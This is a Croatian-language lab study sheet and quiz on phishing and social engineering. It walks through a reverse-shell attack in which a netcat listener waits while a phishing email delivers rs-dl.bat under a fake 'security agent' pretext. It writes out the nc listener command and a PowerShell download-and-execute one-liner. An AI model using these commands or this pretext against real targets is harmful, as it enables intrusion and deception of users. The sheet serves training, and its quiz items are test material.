Socijalni inženjering i phishing
Socijalni inženjering manipulira ljudskim ponašanjem umjesto tehničkim ranjivostima. Phishing je najčešći oblik — lažni email koji navodi žrtvu na akciju.
Elementi phishing emaila
- Pretext — izmišljeni scenarij koji je uvjerljiv žrtvi (npr. "IT sektor — obavezna instalacija sigurnosnog agenta")
- Urgentnost — pritisak na brzu akciju bez razmišljanja
- Autoritet — lažni pošiljatelj s autoritetom (IT, CEO, HR)
- Privici ili linkovi — maliciozni payload dostavljen phishingom
Spear phishing vs. Phishing
- Phishing — masovni napad na veliki broj primatelja
- Spear Phishing — ciljani napad na specifičnu osobu/organizaciju
- Whaling — spear phishing usmjeren na visoki menadžment
- Vishing — phishing putem telefona (Voice Phishing)
- Smishing — phishing putem SMS poruka
Netcat reverse shell
Netcat listener na napadaču
nc -l -k -p 7890 -l— listen mode (sluša za dolazne veze)-k— keep listening (ponovo sluša nakon isključenja)-p 7890— port na kojem sluša- Napadač pokreće listener PRIJE slanja payloada žrtvi
Reverse shell vs Bind shell
- Reverse shell: žrtva se spaja na napadača (izlazni promet iz vatrozida)
- Bind shell: napadač se spaja na žrtvu (teže kroz vatrozid)
- Reverse shell je preferiraniji jer izlazni promet je manje filtriran
- Port 7890 ili drugi neuobičajeni port za zaobilaženje filtera
rs-dl.bat i pretext
rs-dl.bat — reverse shell downloader
- Batch skripta koja: preuzima reverse shell binary i pokreće ga
- Dostavlja se phishing emailom kao privitak
- Pretext: "Molimo pokrenite ovu skriptu za instalaciju sigurnosnog agenta"
- PowerShell alternativa:
IEX (New-Object Net.WebClient).DownloadString(URL)
Tijek phishing napada s reverse shellom
- Napadač pokreće nc listener:
nc -l -k -p 7890 - Napadač šalje phishing email s rs-dl.bat privitkom
- Žrtva otvara email i pokreće rs-dl.bat (pretext)
- rs-dl.bat preuzima reverse shell payload i pokreće ga
- Payload se konektira na napadačev nc listener
- Napadač dobiva shell pristup žrtvinoj mašini
1. Što je "pretext" u kontekstu socijalnog inženjeringa?
2. Koja je razlika između phishinga i spear phishinga?
3. Što radi zastavica -k u naredbi nc -l -k -p 7890?
-k (keep) = kad se klient odspoji, netcat ostaje u listen modu i čeka sljedeću vezu umjesto da se ugasi. Korisno kad payload može pokušati višeput ili kad napadač želi primiti više veza od istog payloada.4. Zašto je reverse shell lakši za prolaz kroz vatrozid od bind shella?
5. Koji je ispravan redoslijed — napadač mora pokrenuti nc listener PRIJE ili NAKON slanja payloada?
6. Što je rs-dl.bat?
rs-dl.bat (reverse shell downloader) = maliciozna batch (.bat) skripta koja preuzima reverse shell binary s napadačevog servera i pokreće ga. Dostavlja se kao email privitak uz pretext (npr. "sigurnosni agent").7. Koji psihološki princip koristi napadač kad u phishing emailu piše "HITNO: Lozinka istječe za 2 sata — kliknite odmah"?
8. Kako se naziva phishing koji cilja visoke izvršne direktore (CEO, CFO)?
9. Na koji port sluša netcat listener u ovom labu?
nc -l -k -p 7890. Neuobičajeni portovi (poput 7890) se koriste jer su manji šansa da budu blokirani firewall pravilima, za razliku od standardnih (22, 80, 443) koji su strože nadzirani.10. Koji je pojam za phishing napad koji se provodi putem SMS poruka?
11. U laboratorijskom scenariju, koji pretext koristi napadač za dostavu rs-dl.bat?
12. Koji je napad gdje napadač kreira kopiju legitimnog emaila (koji je žrtva već primila) ali mijenja link u maliciozni?
13. Zašto je netcat (nc) koristan alat za penetracijske testere?